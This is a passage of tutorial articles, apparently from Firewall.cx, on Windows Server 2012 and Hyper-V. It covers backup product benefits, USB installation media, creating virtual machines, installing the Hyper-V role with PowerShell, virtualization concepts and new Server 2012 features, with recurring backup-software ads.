Starting with Windows Server 2012, Hyper-V Server offers a replication service, referred to as Hyper-V Replica, which can be used to build a disaster recovery scenario. Replication takes place every 5 minutes and the changed data is replicated to the Hyper-V servers located at the disaster recovery site. At the disaster site, you only have the replicated changes to restore a virtual machine from a failure. What if you need to restore the full virtual machine? In that case, you would require a full backup copy of the virtual machine, which is only possible if you are using a dedicated Hyper-V backup product.

5. Maintaining Different Versions Of Backup Copies

There are several reasons to maintain different versions of backup copies. One of the reasons is to revert back configuration to a point-in-time and another reason is to restore the business services as quickly as possible from a backup copy of your choice. A dedicated Hyper-V backup product can maintain several backup copies of a virtual machine.

6. Agentless Backups/Restores

Most third-party Hyper-V backup products ship without an agent. An agent is a piece of software installed on a Hyper-V server which communicates with the backup software. With agentless backup software, it is easy for administrators to perform backup and restore operations without worrying about the agent’s state or responsiveness.

7. Timely Backing up virtual machines

As part of the standard IT process, many organizations have a strategy in place in which backups for critical IT components including virtual machines are scheduled in a timely manner. These backups ensure that in case of any disaster (including physical), the service can be restored from a backup copy taken from a dedicated backup product rather than relying on native methods. The backup copy not only allows you to restore services but also helps you understand the impact of restoring a backup copy which is older.

8. Centralized Management

Backup software ships with a centralized management tool. The centralized management tool is capable of managing multiple Hyper-V Servers and checking the backup operations on multiple Hyper-V servers from a single console.

9. Avoid Unnecessary Files Backup

Since the backup software is designed to work with a specific technology, it is designed in such a way that it excludes the files which are not necessary to include in the virtual machine backup copies. This helps in reducing the backup copy size.

10. Compression

A dedicated Hyper-V backup product offers compression of backup data before it is written to the backup drive. You can enable or disable compression for all or selected virtual machines using the third-party backup product’s console.

11. Encryption

Security is the major concern for IT organizations nowadays. Third-party Hyper-V Backup products use encryption technology to encrypt backup copies stored on a backup drive. These backup copies can only be read by the same Hyper-V backup product.

12. Backup & Offsite Location

As part of their IT processes, most organizations ensure that backup copies are kept at an off-site location so they can be retrieved easily if a disaster takes place at the production site. Native tools do not support backing up to an off-site location. Third-party backup products can provide an off-site backup feature in which backup copies are saved to an off-site location without requiring much network bandwidth.

13. Incremental Backup Copies

A dedicated Hyper-V backup product ensures that only changed contents are backed up rather than taking a full backup copy every time the backup job runs.

14. More Backup Options

Third-party backup products provide more backup options like taking daily backups or monthly backups which can be scheduled at a pre-defined interval using the centralized management console.

15. Backup To External Sources

Third-party Hyper-V backup products support backing up virtual machines to external targets including USB external devices, eSATA external drives, USB flash drives, file server network shares, NAS devices, and RDX cartridges.

16. Backup Retention Policies

Old backup copies can be deleted if they are not required. You can configure the backup retention policy for each virtual machine. A dedicated Hyper-V Backup product can take automatic actions to delete the older backup copies as per the retention policy you configure.

17. Ability To Restore Individual Files Or Folders

Without using a dedicated Hyper-V backup product, it would be difficult for IT administrators to restore individual files/folders from a virtual machine backup copy. Some backup products provide a feature called “Exchange Level Item Restore” which can be used to restore selected emails or mailboxes from a backup copy of a virtual machine.

18. Application Vendor Recommendation For Backup Products

Many application vendors require, or recommend, that an enterprise backup system is installed in the production environment to back up the data of their applications running in virtual machines. Native backup tools often cannot satisfy this requirement, whereas a dedicated Hyper-V backup product can.

19. Error & Reporting

Error handling and reporting are key features of a third-party backup product. Error notifications let you take the necessary actions if a backup or restore operation fails, and using the reporting feature you can see how many virtual machines have been backed up successfully and how many have failed.

20. Support

If you are unable to restore a virtual machine from a backup copy, or you hit an error during a restore or backup operation, you can always contact product support to get you out of the situation. Many third-party backup products provide 24/7 support for their products.

FREE Hyper-V & VMware Backup:  Easy to use - Powerful features - Just works, no hassle:   It's FREE for Firewall.cx readers!  Download Now!

Altaro Hyper-V Backup

Altaro Hyper-V Backup offers a simple, easy-to-use solution for backing up Hyper-V VMs. It includes features such as offsite backup, remote management, Exchange item-level Restore, Compression, Encryption, and much more at an affordable cost.


How to Install Windows Server 2012 from USB Flash – ISO Image

Most will remember the days when we needed a CD-ROM or DVD-ROM drive in order to install an operating system. Today, it is very common to install an operating system directly from an ISO image, and when dealing with virtualized systems it becomes pretty much a necessity.

This article will show how to install Windows Server 2012 (the same process can be used for almost all other operating systems) from a USB Flash.

The only prerequisites for this process to work are that you have a USB flash drive big enough to fit the ISO image and that the server (or virtualization platform) supports booting from USB. If these two requirements are met, it’s a pretty straightforward process.

 FREE Hyper-V & VMware Virtualization Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

The Windows 7 USB-DVD Tool

The Windows 7 USB/DVD Tool is a freely distributed application available in our Administrator Utilities download section. The application is used to transfer the ISO image of the operating system we want to install onto our USB flash drive. The application is also able to burn the ISO image directly to a DVD – a very handy feature.

Download a copy, install and run it on the computer where the ISO image is available.

When the tool runs, browse to the path where the ISO image is located. Once selected, click on Next:

Installing Windows 2012 via USB Flash

At this point, we can choose to copy the image to our USB device (USB Flash) or directly on to a DVD. We select the USB Device option:

windows-2012-installation-usb-flash-2

In the next screen, we are required to select the correct USB device. If more than one USB storage device is connected, extra care must be taken to ensure the correct USB flash drive is selected. If no USB flash drive has been connected yet, insert it now into your USB port and click the refresh button for it to appear:

windows-2012-installation-usb-flash-3

After selecting the appropriate USB device, click on Begin Copying to start the transfer of files to the USB Flash:

windows-2012-installation-usb-flash-4

Once the copy process is complete, we are ready to remove our USB Flash and connect it to our server:

windows-2012-installation-usb-flash-6

 FREE Hyper-V & VMware Virtualization Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

This completes our article on how to install Windows Server 2012 from USB Flash device. We recommend users visit our Windows 2012 section and browse our growing database of high-quality Windows 2012 and Hyper-V Virtualization articles.


Creating a Virtual Machine in Windows Hyper-V. Configuring Virtual Disk, Virtual Switch, Integration Services and other Components

Our previous articles covered basic concepts of Virtualization along with the installation and monitoring of Windows 2012 Hyper-V. This article takes the next step, which is the installation of a guest host (Windows 8.1) on our Windows 2012 Hyper-V enabled server. The aim of this article is to show how easily a guest operating system can be installed and configured, while explaining the installation and setup process. Additional Windows 2012 Server and Hyper-V technical articles can be found in our Windows 2012 Server section.

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Steps To Create A Virtual Machine In Hyper-V

To begin the creation of our first virtual machine, open the Hyper-V manager in Windows Server 2012. On the Actions pane located on the right side of the window, click New and select Virtual Machine:

windows-hyper-v-host-1

 

Read the Before you begin page, which contains important information, and then click Next:

Windows Hyper-V Creating new VM

Type the name of the virtual machine and configure the location where the virtual hard disk of this virtual machine will be stored. On server systems with shared storage devices, the virtual hard disk is best stored on the shared storage for performance and redundancy reasons; otherwise select a local hard disk drive. For the purpose of this lab, we will be using the server’s local C drive:

Choose the generation of the virtual machine and click Next. Generation 2 is new with Server 2012 R2. If the guest operating system will be Windows Server 2012 or 64-bit Windows 8/8.1, select Generation 2; otherwise select Generation 1:

Hyper-V Installing VM & Selecting VM Generation

Next step involves assigning the amount of necessary memory. Under Assign Memory configure the memory and click Next. For the purpose of this lab, we will give our Windows 8.1 guest operating system 1 GB memory:

Hyper-V Assigning Memory to VM

Under configure networking tab, leave the default setting and click Next. You can create virtual switches later and re-configure the virtual machine settings as required:

Hyper-V Installing VM - Configuring VM Switch

Next, choose to create a virtual hard disk and specify the size. We allocated a 60 GB disk size for our Windows 8.1 installation. When ready, click Next:

Hyper-V Configuring Virtual Hard Disk

One of the great benefits of virtual machines is that we can proceed with the installation of the new operating system using an ISO image, rather than a CD/DVD.

Browse to the selected ISO image and click the Next button. The virtual machine will try to boot from the selected ISO disk when it starts, so it is important to ensure the ISO image is bootable:

Hyper-V Installing VM from ISO Image

The last step allows us to review the virtual machine’s configuration summary. When ready click the Finish button:

Hyper-V VM Summary Installation
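
The same virtual machine can also be created from PowerShell. The sketch below roughly mirrors the wizard settings used in this lab; the VM name, virtual switch name and file paths are examples only:

PS C:\Windows\system32> New-VM -Name "Windows81" -Generation 2 -MemoryStartupBytes 1GB -NewVHDPath "C:\VMs\Windows81.vhdx" -NewVHDSizeBytes 60GB -SwitchName "External Switch"
PS C:\Windows\system32> Add-VMDvdDrive -VMName "Windows81" -Path "C:\ISO\Windows81.iso"    # attach the bootable ISO
PS C:\Windows\system32> Set-VMFirmware -VMName "Windows81" -FirstBootDevice (Get-VMDvdDrive -VMName "Windows81")    # boot from the ISO first
PS C:\Windows\system32> Start-VM -Name "Windows81"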

Install Windows 8.1 Guest Operating System In Hyper-V Virtual Machine

With the configuration of our virtual machine complete, it’s time to power on our virtual machine and install the operating system. Open Hyper-V Manager, and under the Virtual Machines section double-click the virtual machine created earlier. Click on the start button from the Action Menu to power on the virtual machine:

Hyper-V Starting a VM Machine

After the virtual machine completes its startup process, press any key to boot from the Windows 8.1 disk (ISO media) we configured previously. The Windows 8.1 installation screen will appear in a couple of seconds. Click Next followed by the Install Now button to begin the installation of the Windows operating system on the virtual machine:

Hyper-V Begin Windows 8 VM installation

After accepting the End User License Agreement (EULA), we can continue the setup by selecting and configuring the hard disk. Windows will then begin its installation and update the screen as it progresses. Finally, once the installation is complete, we are presented with the Personalization screen and then the Start Screen:

Hyper-V VM Windows8 Start Screen

After the operating system installation and configuration is complete, it is important to proceed with the installation of Integration Services.

Integration Services on Hyper-V is what VM Tools is for VMware. Integration Services significantly enhance the guest operating system’s performance, allow easy file copy from the host machine to the guest machine, provide time synchronization between host and guest, and improve management of the VM by replacing the generic operating system drivers for the mouse, keyboard, video card, network and SCSI controller components.

Other services offered by Integration Services are:

  • Backup (Volume Snapshot)
  • Virtual Machine Connection Enhancements
  • Hyper-V Shutdown Service
  • Data Exchange

To proceed with the installation of Integration Services, go to the virtual machine’s console, select Action, and click Insert Integration Services Setup Disk as shown below:

Hyper-V Host Integration Services installation

In the Upgrade Hyper-V Integration Services dialog box, click OK and, when prompted, click Yes to restart the virtual machine. Using the Hyper-V Manager console, administrators can keep track of all installed VMs alongside their CPU usage, assigned memory and uptime:

Hyper-V Manager - VM Status

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

This completes our article covering the installation of a Virtual Machine within Hyper-V and setup of Integration Services. Additional Windows 2012 Server and Hyper-V technical articles can be found in our Windows 2012 Server section.

 


How to Install Windows 2012 Hyper-V via Server Manager & Windows PowerShell. Monitoring Hyper-V Virtual Machines

Our previous article covered the basic concepts of Virtualization and Windows Server 2012 Hyper-V.  This article takes a closer look at Microsoft’s Hyper-V Virtualization platform and continues with the installation of the Hyper-V role via the Windows Server Manager interface and Windows PowerShell command prompt.

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Hyper-V is a server role used to create a virtualized environment by deploying different types of virtualization technologies such as server virtualization, network virtualization and desktop virtualization. The Hyper-V server role can be installed on the Server 2012 R2 Standard, Datacenter or Essentials editions. Hyper-V 3.0 is the latest version of Hyper-V, available in Windows Server 2012 R2. Additional Windows 2012 Server and Hyper-V technical articles can be found in our Windows 2012 Server section.

To learn more about the licensing restrictions on each Windows Server 2012 edition, read our article Windows 2012 Server Foundation, Essential, Standard & Datacenter Edition Differences, Licensing & Supported Features. 

Hyper-V Hardware Requirements

The Hyper-V server role has specific hardware requirements that must be met. The minimum hardware requirements are listed below:

  • Processor: 1.4GHz 64-bit with hardware-assisted virtualization, available in processors that include a virtualization option – specifically, Intel Virtualization Technology (Intel VT) or AMD Virtualization (AMD-V). Hardware-enforced Data Execution Prevention (DEP) must also be available and enabled; specifically, you must enable the Intel XD bit (execute disable bit) or AMD NX bit (no execute bit).
  • Memory: 512 MB
  • Network Adapter: At least one Gigabit Ethernet adapter
  • Disk Space: 32 GB

Keep in mind that the above list specifies the minimum requirements. If you want to install Hyper-V in a production environment along with a number of virtual machines, you will definitely need more than 512MB of memory and 32GB of disk space.

Click here for Windows Server 2016 Hyper-V Requirements

Installing The Hyper-V Server Role In Server 2012 Using Server Manager

In Windows Server 2012, you can install the Hyper-V server role using Server Manager (GUI) or Windows PowerShell. In both cases, the user performing the installation must be an Administrator or a member of the Administrators or Hyper-V Administrators group.

First, open Server Manager, click Manage and select the Add Roles and Features option:

windows-2012-hyper-v-install-config-1Add Role and Features

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Click Next on the Before you begin page.

Choose Role-based or feature-based Installation option and click Next button:

windows-2012-hyper-v-install-config-2
 Choose Role-based or feature-based Installation

In the next window, click on Select a server from the server pool option and select the server where you would like to install the Hyper-V server role. Click on Next after selecting the server:

windows-2012-hyper-v-install-config-3
 Select the Destination Server to Install Hyper-V

The next screen lists the available roles for installation, check Hyper-V and click Next:

windows-2012-hyper-v-install-config-4
Selecting the Hyper-V Role for Installation

Read the Hyper-V role information and click the Next button:

windows-2012-hyper-v-install-config-5
 Hyper -V Installation

The next step involves the creation of Virtual Switches. Choose your server’s physical network adapters that will take part in the virtualization:

windows-2012-hyper-v-install-config-6
Creating Your Virtual Switches

The selected physical network adapters (in case you have more than one available) will be used and shared by virtual machines to communicate with the physical network. After selecting the appropriate network adapters, click Next to proceed to the Migration screen.

Under Migration, leave the default settings as is and click Next:

windows-2012-hyper-v-install-config-7
Leave Default Migration Settings

These settings can also be modified later on. Live Migration is similar to VMware’s vMotion, allowing the real-time migration of virtual machines to another physical host (server).

Under Default Stores, you can configure the location of hard disk files and configuration files of all virtual machines. This is a location where all the virtual machine data will reside. You can also configure a SMB shared folder (Windows network folder), local drive or even a shared storage device.

We will leave the settings to their default location and click the Next button.

windows-2012-hyper-v-install-config-8
Selecting a Location to Store the Virtual Machines

The final screen allows us to review our configuration and proceed with the installation by clicking on the Install button:

windows-2012-hyper-v-install-config-9
Hyper-V Installation Confirmation

 Windows will now immediately begin the installation of the Hyper-V role and continuously update the installation window as shown below.

windows-2012-hyper-v-install-config-10
Hyper-V Installation Progress

Once the installation of Hyper-V is complete, the Windows server will restart.

Installing Hyper-V Role Using Windows PowerShell

The second way to install the Hyper-V role is via Windows PowerShell. Surprisingly enough, the installation is initiated with a single command.

Type the following cmdlet in PowerShell to install the Hyper-V server role on your Windows Server 2012:

C:\Users\Administrator> Install-WindowsFeature -Name Hyper-V -IncludeManagementTools -Restart

windows-2012-hyper-v-install-config-11-large 
Hyper-V Installation with PowerShell   

To install the Hyper-V server role on a remote computer, include the -ComputerName switch. In our example, the remote computer is named Voyager:

C:\Users\Administrator> Install-WindowsFeature -Name Hyper-V -ComputerName Voyager -IncludeManagementTools -Restart
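
To confirm the role was installed successfully, you can query its state; the output should show Hyper-V with an Install State of Installed:

C:\Users\Administrator> Get-WindowsFeature -Name Hyper-V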

Once the installation is complete, the server will restart. Once the server has booted, you can open Hyper-V Server Manager and begin creating the virtual machines:

windows-2012-hyper-v-install-config-12
Hyper-V Manager

Monitoring Of Hyper-V Virtual Machines

When working in a virtualization environment, it is extremely important to keep an eye on the virtualization services and ensure everything is running smoothly.

Thankfully, Microsoft provides an easy way to monitor Hyper-V elements and take action before things get to a critical stage.

The Hyper-V Manager console allows you to monitor the processor, memory, networking, storage and overall health of the Hyper-V server and its virtual machines, while additional Hyper-V metrics are accessible through Task Manager, Resource Monitor, Performance Monitor and Event Viewer.

The screenshot below shows the Hyper-V Manager with one virtual machine installed.  At a first glance, we can view the VM’s state, CPU Usage, Assigned Memory and Uptime:

windows-2012-hyper-v-install-config-13-large
View Virtual Machine Status

Under Windows Event Viewer we’ll find a number of advanced logs that provide a deeper view of the various Hyper-V components, as shown below:

windows-2012-hyper-v-install-config-14
Hyper-V Events (click to enlarge)

Additional information on Hyper-V can be obtained through Windows Performance Monitor, which provides a number of useful Hyper-V counters, as shown below:

windows-2012-hyper-v-install-config-15
Hyper-V Performance Monitor

Most experienced virtualization administrators will agree that managing and monitoring a virtualization environment can be a full-time job. It is very important to ensure your virtualization strategy is well planned and VMs are hosted on servers with plenty of resources such as Physical CPUs, RAM and Disk storage space, to ensure they are not starved of these resources during periods of high-utilization.

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Keeping an eye on Hyper-V’s Manager, Performance Monitor counters and Event Viewer will help make sure no critical errors or problems go without notice.


Introduction To Windows Server 2012 R2 Virtualization - Understanding Hyper-V Concepts, Virtual Desktop Infrastructure (VDI) and more

FREE Hyper-V & VMware Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

Virtualization is an abstraction layer that creates separate, distinct virtual environments, allowing the operation of different operating systems, desktops and applications under the same or a combined pool of resources. In the past couple of years, virtualization has gained an incredible rate of adoption as companies consolidate their existing server and network infrastructure, hoping to create a more efficient infrastructure that can keep up with their growing needs while keeping running and administration costs as low as possible.

Our readers can visit our dedicated Windows Server 2012 Server section to read more on Windows Hyper-V Virtualization and Windows Server 2012 technical articles.

When we hear the word ‘Virtualization’, most think about ‘server virtualization’ – which of course is the most widely applied scenario, however today the term virtualization also applies to a number of concepts including:

  • Server virtualization: - Server virtualization allows multiple operating systems to be installed on top of single physical server.
  • Desktop virtualization: - Desktop virtualization allows deployment of multiple instances of virtual desktops to users through the LAN network or Internet. Users can access virtual desktops by using thin clients, laptops, or tablets.
  • Network virtualization: - Network virtualization also known as Software Defined Networking (SDN) is a software version of network technologies like switches, routers, and firewalls. The SDN makes intelligent decisions while the physical networking device forwards traffic.
  • Application virtualization: - Application virtualization allows an application to be streamed to many desktop users. Hosted application virtualization allows the users to access applications from their local computers that are physically running on a server somewhere else on the network.

This article will be focusing on the Server virtualization platform, which is currently the most active segment of the virtualization industry.  As noted previously, with server virtualization a physical machine is divided into many virtual servers – each virtual server having its own operating system.  The core element of server virtualization is the Hypervisor – a thin layer of software that sits between the hardware layer and the multiple operating systems (virtual servers) that run on the physical machine.

The Hypervisor provides the virtual CPUs, memory and other components and intercepts virtual servers requests to the hardware. Currently, there are two types of Hypervisors:

Type 1 Hypervisor – This is the type of hypervisor used for bare-metal servers. These hypervisors run directly on the physical server’s hardware and the operating systems run on top of it. Examples of Type-1 Hypervisors are Microsoft’s Hyper-V, VMware ESX, Citrix XenServer.

Type 2 Hypervisor – This is the type of hypervisor that runs on top of existing operating systems. Examples of Type-2 Hypervisors are VMware Workstation, SWSoft’s Parallels Desktop and others.

FREE Hyper-V & VMware Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

Microsoft Server Virtualization – Hyper-V Basics

Microsoft introduced its server virtualization platform Hyper-V with the release of Windows Server 2008. Hyper-V is a server role that can be installed from Server Manager or PowerShell in Windows Server 2012.

With the release of Windows Server 2012 and Windows Server 2012 R2, Microsoft has made a lot of improvements to its Hyper-V virtualization platform. Features like live migration, dynamic memory, network virtualization, RemoteFX, Hyper-V Replica, etc. have been added to the new Hyper-V 3.0 in Server 2012.

Hyper-V is a type 1 hypervisor that operates right above the hardware layer. The Windows Server 2012 operating system remains above the hypervisor layer, despite the fact the Hyper-V role is installed from within the Windows Server operating system. The physical server where Hypervisor or Hyper-V server role is installed is called the host machine or virtualization server. Similarly, the virtual machines installed on Hyper-V are called guest machines.

Understanding Traditional vs Modern Server Deployment Models

Let’s take a look at the traditional way of server configuration. The figure below shows the typical traditional server deployment scenario where one server per application model is applied. In this deployment model, each application has its own dedicated physical server.

windows-hyper-v-concepts-vdi-1Traditional Server Deployment

This traditional model of server deployment has many disadvantages, such as increased setup costs, management and backup overhead, increased physical space and power requirements, plus many more. Resource utilization in this type of deployment is usually below 10%. Practically, this means that we have five underutilized servers.

Virtualization comes to dramatically change the above scenario.

Using Microsoft’s Windows Server 2012 along with the Hyper-V role installed, our traditional server deployment model is transformed into a single physical server with a generous amount of resources (CPU, Memory, Storage space, etc) ready to undertake the load of all virtual servers.

The figure below shows how the traditional model of server deployment is now virtualized with Microsoft’s Hyper-V server:

windows-hyper-v-concepts-vdi-2Hyper-V Server Consolidation

As shown in the figure above, all the five servers are now virtualized into single physical server. It is important to note that even though these virtual machines run on top of the same hardware platform, each virtual server is completely isolated from other virtual machines.

There are many benefits of this type of virtualized server consolidation. A few important benefits are reduced management overhead, faster server deployment, efficient resource utilization, reduced power consumption and so on.

Network Virtualization With Hyper-V

With the power of network virtualization you can create a multi-tenant environment and assign virtual machines, or groups of virtual machines, to different organizations or departments. In a traditional network, you would simply create different VLANs on physical switches to isolate them from the rest of the network(s). Likewise, in Hyper-V, you can also create VLANs and virtual switches to isolate them from the network in the same way.

Readers can also refer to our VLAN section that analyses the concept of VLANs and their characteristics.

For example, you can configure a group of virtual machines on the 192.168.1.0/24 subnet and other group of virtual machines on 192.168.2.0/24 subnet.

windows-hyper-v-concepts-vdi-3Hyper-V Networking

Each virtual machine can have more than one virtual network adapter assigned to it. Like regular physical network adapters, the virtual network adapters can be configured with IP addresses, MAC addresses, NIC teaming and so on. These virtual network adapters are connected to a virtual switch. A Virtual switch is a software version of physical switch that is capable of forwarding traffic, VLAN traffic, and so on. The virtual switch is created from within the Hyper-V Manager and is then connected to one or more available physical network adapters of the host machine. The physical network adapters on the host machine are then connected to physical switch on the network.

As shown in figure 1.3, three VLANs are created under the same virtual switch. The host is then connected to the physical switch, usually by combining multiple physical network cards into one interface, also called a LAG (Link Aggregation Group) or EtherChannel (Cisco’s implementation of LAG). A LAG or EtherChannel combines the speed of the member network adapters: if, for example, we have two 1Gbps physical network cards, with the use of LAG or EtherChannel these are combined into a single 2Gbps logical network card.

Microsoft’s Hyper-V supports the creation of three different types of virtual switches (a PowerShell sketch for creating each type follows the list):

  1. Internal: - The internal virtual switch allows communication between the virtual machines and the Hyper-V host itself, but it does not connect to the physical network infrastructure (e.g. switches).
  2. External: - The external virtual switch is bound to a physical network adapter and allows seamless communication between the virtual machines and the physical network.
  3. Private: - The private virtual switch allows communication only between virtual machines on the same host; the host and the physical network cannot reach it. A common example is a cluster-based system where virtual servers communicate with each other over a dedicated network connection.
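
For reference, the sketch below creates one virtual switch of each type from PowerShell; the switch names and the physical adapter name "Ethernet 1" are examples only:

PS C:\Windows\system32> New-VMSwitch -Name "External vSwitch" -NetAdapterName "Ethernet 1" -AllowManagementOS $true
PS C:\Windows\system32> New-VMSwitch -Name "Internal vSwitch" -SwitchType Internal
PS C:\Windows\system32> New-VMSwitch -Name "Private vSwitch" -SwitchType Private
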
FREE Hyper-V & VMware Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

Virtual Desktop Infrastructure (VDI) Deployment With Hyper-V

VDI is a new way of delivering desktops to end users. In VDI, virtual desktops are hosted centrally as virtual machines and are provided or streamed to users via the network or Internet using the Remote Desktop Protocol (RDP) service. These virtual desktops can be accessed by users with different types of devices, like PCs, laptops, tablets, smartphones, thin clients, and so on. VDI has helped fuel the Bring Your Own Device (BYOD) trend. With a BYOD policy implemented in the organization, users can bring their own devices, such as laptops and tablets, and the company delivers the required virtual desktop via the network infrastructure.

VDI is an upcoming trend that offers many advantages such as:

  • Central management and control
  • Low cost, since there is no need for desktop PCs; alternative devices such as thin clients are usually preferred
  • Low power consumption. Tablets, thin clients, laptops require low power compared to traditional desktop or tower PCs
  • Faster desktop deployments
  • More efficient backup

VDI is fully supported and can be implemented in Windows Server 2012 by installing Remote Desktop Services server role and configuring the virtualization host. You can create virtual machines running Windows XP/7/8 and easily assign the virtual machines to users.

We’ve covered a few of the important virtualization features deployable with Windows Server 2012 and Hyper-V, that allow organizations to consolidate their server, network and desktop infrastructure, into a more efficient model. 

Our readers can visit our dedicated Windows Server 2012 Server section to read more on Windows Hyper-V Virtualization and Windows Server 2012 offerings.


New Features in Windows Server 2012 - Why Upgrade to Windows 2012

There is no doubt that cloud computing is a hot topic these days. Innovations in cloud computing models have made IT departments across every industry re-think their traditional model of computing. Realizing the benefits and challenges of cloud computing, Microsoft has joined the game by releasing a cloud-optimized server operating system called Windows Server 2012.

Windows Server 2012 has dozens of new features and services that make it cloud ready. Windows Server 2012 R2 is the latest version of Microsoft’s server operating system and the successor to Server 2012. For more technical articles on Windows 2012 Server and Hyper-V Virtualization, visit our Windows 2012 Server section.

Let’s take a look at some of the new features Windows Server 2012 now supports:

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Windows Server Manager

Server Manager is one of the major changes of Windows Server 2012. With a new ‘look and feel’ of the Server Manager user interface, administrators now have the option to group multiple servers on their network and manage them centrally – a useful feature that will save valuable time. With this grouping feature, monitoring events, services, installed roles, performance, on multiple servers from a single window is easy, fast and requires very little effort.

windows-2012-features-1

Figure 1. Windows Server 2012 - Server Manager Dashboard (click to enlarge)

As with the Server Manager in previous Windows Server versions, it can be used to install server roles and features in Windows Server 2012.

Windows PowerShell 3.0

PowerShell 3.0 is another important improvement in Windows Server 2012. PowerShell is a command-line and scripting tool that gives administrators greater control of Windows servers. The graphical user interface (GUI) of Windows Server 2012 is built on top of PowerShell 3.0: when you click buttons in the GUI, PowerShell cmdlets and scripts run in the background, ‘translating’ mouse clicks into executable commands and scripts.

PowerShell scripts allow more tasks to be executed in less time, and running without the GUI generally means fewer crashes and problems.

windows-2012-features-2Figure 2. Windows Server 2012 PowerShell

Hundreds of PowerShell cmdlets have been added to Windows Server 2012 and we expect a lot more to be added in the near future, expanding their functionality and providing a new faster and more stable way to administer a Windows Server 2012.

Hyper-V 3.0

Similar to VMware’s ESXi hypervisor, Hyper-V is Microsoft’s virtualization platform. It allows many virtual machines to run on a single physical Windows Server 2012 host. Hyper-V features such as live migration, dynamic memory, network virtualization, RemoteFX, Hyper-V Replica, etc. have made the Hyper-V platform more competitive against other alternatives.

The screenshot below shows the Hyper-V Manager console:

windows-2012-features-3Figure 3. Windows Server 2012 - Hyper-V Manager (click to enlarge)

When combined with Microsoft’s System Center, Windows Hyper-V becomes much more powerful and a very competitive solution that can even support private or public clouds.

Hyper-V Replica

Windows Server 2012 Hyper-V roles introduces a new capability – Hyper-V Replica - a feature many administrators will welcome.

This new feature allows the asynchronous replication of selected VMs to a replica server. On the local LAN, this means you get a full copy of your VMs on another hardware server, while on a WAN scale this can be extended to replicate VMs to a designated replica site across a WAN infrastructure; a common example of WAN replication is a disaster recovery site. In Windows Server 2012, changes are replicated every 5 minutes, so the replica VM will typically be a few minutes behind its source, the primary VM (Windows Server 2012 R2 adds 30-second and 15-minute replication intervals).

When enabled, Hyper-V Replica first performs an initial replication of the whole virtual machine, which can take considerable time depending on the amount of data; from then on, only changes are replicated.

Server Message Block (SMB) 3.0

SMB is a file-sharing protocol used in Windows servers. In Windows Server 2012, SMB is now at version 3.0, with interesting new features such as support for deduplication, hot-pluggable interfaces, multichannel, encryption, Volume Shadow Copy Service (VSS) for shared files, and many more.

In addition, Hyper-V’s Virtual Hard Disk (VHD) files and virtual machines can also be hosted on shared folders. This allows the effective usage of shared folders, ensuring you make the most out of all available resources.

Dynamic Access Control (DAC)

DAC is a central management system for the security permissions of files and folders. In a nutshell, DAC is a new and flexible way of setting up permissions on files and folders. With DAC, an administrator can classify data according to user claims, device claims and resource properties. Once data is classified, you can set up permissions to control user access to the classified data.

Storage Space

Storage Space is also another new feature of Windows Server 2012. This new feature pools different physical disks together and divides them into different spaces. These spaces are then used like regular disks. In the storage pool control panel (shown below), you can add any type or size of physical disks (e.g SSD, SCSI, SATA etc).  You can also configure mirroring, raid redundancy and more.

Likewise, you can add storage at any time and the new space will automatically become available for use in the storage space. Provisioning is also supported in Storage Spaces, allowing you to specify whether the new space should be thin or thick provisioned. With thin provisioning, disk space is allocated automatically on an “as needed” basis, avoiding occupying disk space unnecessarily.

windows-2012-features-4-large Figure 4. Windows Server 2012 - Storage Space

Following are pointers on the main features provided by Storage Space:

  • Obtain and easily manage reliable and scalable storage with reduced cost
  • Aggregate individual drives into storage pools that are managed as a single entity
  • Utilize simple inexpensive storage with or without external storage
  • Provision storage as needed from pools of storage you’ve created
  • Grow storage pools on demand
  • Use PowerShell to manage Storage Spaces for Windows 8 clients or Windows Server 2012
  • Delegate administration by specific pool
  • Use diverse types of storage in the same pool: SATA, SAS, USB, SCSI
  • Use existing tools for backup/restore as well as VSS for snapshots
  • Designate specific drives as hot spares
  • Automatic repair for pools containing hot spares with sufficient storage capacity to cover what was lost
  • Management can be local, remote, through MMC, or PowerShell

DirectAccess

DirectAccess is Microsoft’s answer to VPN connectivity, allowing remote clients to access your network under an encrypted connection.  Thanks to its easy installation and improved friendly interface, administrators are able to quickly setup and manage VPN services on their Windows Server 2012 system. 

DirectAccess supports SSL (WebVPN) and IPSec protocols for VPN connections. A very interesting feature is the ‘Permanent VPN’ which allows mobile users to establish their VPN initially and then place it ‘on hold’ when their internet connectivity is lost.  The VPN session will then automatically resume once the user has Internet access again. 

This time-saving feature ensures VPN users experience a seamless VPN connection to the office without the frustration of logging in every time Internet connectivity is lost, while also allowing the automation of other tasks in the background (e.g. remote backup of files).

Data Deduplication

Data Deduplication is a specialized data compression technique for eliminating duplicate copies of repeating data.  In the deduplication process, unique chunks of data, or byte patterns, are identified and stored during a process of analysis. As the analysis continues, other chunks are compared to the stored copy and whenever a match occurs, the redundant chunk is replaced with a small reference that points to the stored chunk. 

We should note that Data Deduplication is not only a Windows 2012 Server feature, but a technology supported by many vendors such as EMC, NetApp, Symantec and others.

Window-less Interface: CLI Only-Mode

Microsoft now supports running Windows Server 2012 without a graphical user interface (GUI). You can install and configure Windows Server 2012 with the GUI and, after finishing the setup, remove the GUI completely, or you can choose to install without the GUI from the start.

Running your server without a GUI interface will help save valuable resources and also increase the system’s stability.

IP Address Management (IPAM)

IPAM is a central IP address management tool of your entire network. IPAM can work with DNS and DHCP to better allocate, discover, issue, lease and renew IP addresses. IPAM gives a central view of where IP addresses are being used within your network.

Resilient File System (ReFS)

